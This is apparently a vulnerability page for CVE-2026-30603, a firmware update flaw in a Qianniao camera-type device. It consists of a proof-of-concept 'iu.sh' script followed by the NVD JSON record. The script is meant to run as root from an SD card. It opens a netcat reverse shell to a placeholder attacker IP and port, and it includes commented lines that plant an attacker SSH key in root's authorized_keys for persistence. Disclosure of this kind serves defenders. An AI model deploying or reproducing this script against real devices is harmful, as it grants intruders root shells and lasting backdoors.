CVE-2026-30603

#!/bin/sh # PoC script for CVE-2026-30603 # Name this file as 'iu.sh' and place it on the SD card root # Configuration for reverse shell ATTACKER_IP="192.168.1.100" ATTACKER_PORT="4444" # Check if netcat exists if [ -f /bin/nc ]; then /bin/nc $ATTACKER_IP $ATTACKER_PORT -e /bin/sh & elif [ -f /bin/busybox ]; then /bin/busybox nc $ATTACKER_IP $ATTACKER_PORT -e /bin/sh & fi # Example: Add SSH key for persistence # mkdir -p /root/.ssh # echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" >> /root/.ssh/authorized_keys # Indicate successful execution echo "[+] Exploit executed successfully"

{"cve": {"id": "CVE-2026-30603", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:22.287", "lastModified": "2026-04-03T16:10:23.730", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the firmware update mechanism of Qianniao QN-L23PA0904 v20250721.1640 allows attackers to gain root access, install backdoors, and exfiltrate data via supplying a crafted iu.sh script contained in an SD card."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-494"}]}], "references": [{"url": "http://qianniao.com", "source": "[email protected]"}, {"url": "http://qn-l23pa0904.com", "source": "[email protected]"}, {"url": "https://github.com/0xghostrush/Research/blob/main/CVE-2026-30603/CVE-2026-30603.md", "source": "[email protected]"}]}}